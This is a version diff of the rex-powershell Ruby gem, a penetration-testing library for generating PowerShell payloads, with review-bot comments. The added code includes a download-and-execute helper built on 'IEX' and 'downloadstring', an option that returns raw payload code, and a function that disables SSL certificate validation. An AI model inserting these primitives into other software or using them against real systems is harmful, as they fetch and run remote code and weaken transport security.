rex-powershell 0.1.0 → 0.1.1

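--- a/checksums.yaml
+++ b/checksums.yaml
@@ -1,7 +1,7 @@
  ---
  SHA1:
- metadata.gz: 6e804aa77f3457dbd23306effacfe287a50a3c18
- data.tar.gz: a270712dba4ac88432abc0755a14ba92b757820b
+ metadata.gz: 152b98e69abd262c6e3c3f9a1e5f3f54c5951ee7
+ data.tar.gz: 250ae1eebcbf277c2b31c9b8d2479ef66c50a9ca
  SHA512:
- metadata.gz: 874849a04f6e9d63adf92c90c2386aafab036ca6589eefe4a86da82bf8b6fd03c79932bf4e89c65f6b52dd2e2162dfcc3db1fb61b84c02843357a6b0bc6c8483
- data.tar.gz: e4643295020c14d26f18d12eb8a3b1ecf436eb41e2f662c5f703875782a4984ae3b3afa9dffa978ea8173226e61d611a85cacc27cdde31af4bc51a5760aa9eb8
+ metadata.gz: c7007b550fbf79e2f75060a0cab182b2e5f146c795710ce1785ece6371a3c920b496e5ea09e98fc4ab5e52ec5b6d1417bb7347ff47ee1361bc918a686fb62e71
+ data.tar.gz: 95cd36fe4558132a199060562588cc528a1c467939872582b2d0831550b05c8c2cdc6119de3173cb83552264e44e4a13036e17a45bba345d11752050774b52c1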
checksums.yaml.gz.sig CHANGED
Binary file
data.tar.gz.sig CHANGED
@@ -1 +1 @@
1
- .ݞ��=��
1
+ EW�x�_�.dz
@@ -25,6 +25,16 @@ module Command
25
25
  psh.encode_code(eof)
26
26
  end
27
27
 
28
+ #
29
+ # Return the ASCII contents of the base64 encoded script
30
+ #
31
+ # @param script_in [String] Encoded script
32
+ #
33
+ # @return [String] Decoded script
34
+ def self.decode_script(script_in)
35
+ Rex::Powershell::Script.new(script_in).decode_code
36
+ end
37
+
28
38
  #
29
39
  # Return a gzip compressed powershell script
30
40
  # Will invoke PSH modifiers as enabled
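Review bot: The docs for the new `decode_script` (and for `decompress_script` in the next hunk, new lines 61-69) do not say what happens when `script_in` is not valid base64 or not a valid GZIP/Deflate stream, and helpers like these tend to be pointed at captured scripts that cannot be trusted. `decode_code` and `decompress_code` are not visible in this diff, so the behaviour has to be confirmed there and then recorded with a `# @raise` line or a sentence in `@return`. For `decompress_script` the doc should also note that the output size is not bounded by the input size, so callers handling untrusted samples may need to cap it. "ASCII contents" would be clearer if it named the character encoding the decoder actually assumes.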
@@ -48,6 +58,16 @@ module Command
48
58
  psh.compress_code(eof)
49
59
  end
50
60
 
61
+ #
62
+ # Return the ASCII contents of the GZIP/Deflate compressed script
63
+ #
64
+ # @param script_in [String] Compressed script
65
+ #
66
+ # @return [String] Decompressed script
67
+ def self.decompress_script(script_in)
68
+ Rex::Powershell::Script.new(script_in).decompress_code
69
+ end
70
+
51
71
  #
52
72
  # Generate a powershell command line, options are passed on to
53
73
  # generate_psh_args
@@ -248,6 +268,9 @@ EOS
248
268
  # environment variable at the start of the command line
249
269
  # @option opts [Boolean] :use_single_quotes Wraps the -Command
250
270
  # argument in single quotes unless :encode_final_payload
271
+ # @option opts [TrueClass,FalseClass] :exec_in_place Removes the
272
+ # executable wrappers from the powershell code returning raw PSH
273
+ # for executing with an existing PSH context
251
274
  #
252
275
  # @return [String] Powershell command line with payload
253
276
  def self.cmd_psh_payload(pay, payload_arch, template_path, opts = {})
@@ -340,9 +363,13 @@ EOS
340
363
  command_args[:command] = final_payload
341
364
  end
342
365
 
343
- psh_command = generate_psh_command_line(command_args)
366
+ if opts[:exec_in_place]
367
+ psh_command = "#{command_args[:command]}"
368
+ else
369
+ psh_command = generate_psh_command_line(command_args)
370
+ end
344
371
 
345
- if opts[:remove_comspec]
372
+ if opts[:remove_comspec] or opts[:exec_in_place]
346
373
  command = psh_command
347
374
  else
348
375
  command = "%COMSPEC% /b /c start /b /min #{psh_command}"
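Review bot: With `:exec_in_place` set, `psh_command` is built only from `command_args[:command]`; if the branch that closes just above (it starts outside this hunk) can store the payload under a different key, the interpolation turns `nil` into an empty string and an empty command is returned with no error. I would guard it with `raise ArgumentError, ':exec_in_place requires command_args[:command]' unless command_args[:command]` and then assign `psh_command = command_args[:command].to_s`, which also drops the redundant `"#{...}"` wrapper. The condition below reads better as `if opts[:remove_comspec] || opts[:exec_in_place]`, avoiding the low-precedence `or`. The `@option` doc added in the previous hunk uses `[TrueClass,FalseClass]` where the neighbouring option uses `[Boolean]`; keeping `[Boolean]` would be consistent.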
@@ -70,7 +70,17 @@ module Powershell
70
70
  # @return [String] Powershell code to disable SSL verification
71
71
  # checks.
72
72
  def self.ignore_ssl_certificate
73
- '[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};'
73
+ '[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}'
74
+ end
75
+
76
+ #
77
+ # Download and execute string via HTTP
78
+ #
79
+ # @param url [String] string to download
80
+ #
81
+ # @return [String] PowerShell code to download and exec the url
82
+ def self.download_and_exec_string(url)
83
+ %Q^ IEX ((new-object net.webclient).downloadstring('#{url}'))^
74
84
  end
75
85
 
76
86
  #
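Review bot: `download_and_exec_string` interpolates `url` straight into a single-quoted PowerShell literal, so a value containing `'` ends the literal and the remainder is parsed as code in the generated script. Doubling the quote first keeps the value as data, `safe = url.to_s.gsub("'", "''")` followed by `'#{safe}'`, and the `@param` text should say it expects a URL rather than "string to download". Separately, `ignore_ssl_certificate` no longer returns a trailing `;`, which changes its contract for any caller that concatenates it with further statements; the `@return` doc should state that the caller supplies the separator. The leading space inside `%Q^ IEX` looks accidental.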
@@ -1,5 +1,6 @@
1
1
  # -*- coding: binary -*-
2
2
 
3
+
3
4
  require 'forwardable'
4
5
 
5
6
  module Rex
@@ -1,5 +1,5 @@
1
1
  module Rex
2
2
  module Powershell
3
- VERSION = "0.1.0"
3
+ VERSION = "0.1.1"
4
4
  end
5
5
  end
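--- a/metadata
+++ b/metadata
@@ -1,7 +1,7 @@
  --- !ruby/object:Gem::Specification
  name: rex-powershell
  version: !ruby/object:Gem::Version
- version: 0.1.0
+ version: 0.1.1
  platform: ruby
  authors:
  - David 'thelightcosine' Maloney
@@ -85,7 +85,7 @@ cert_chain:
  2SpuQH+SWteq3NXkAmFEEqvLJQ4sbptZt8OP8ghL3pVAvZNFmww/YVszSkShSzcg
  QdihYCSEL2drS2cFd50jBeq71sxUtxbv82DUa2b+
  -----END CERTIFICATE-----
- date: 2016-06-21 00:00:00.000000000 Z
+ date: 2016-07-15 00:00:00.000000000 Z
  dependencies:
  - !ruby/object:Gem::Dependency
  name: bundler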
metadata.gz.sig CHANGED
Binary file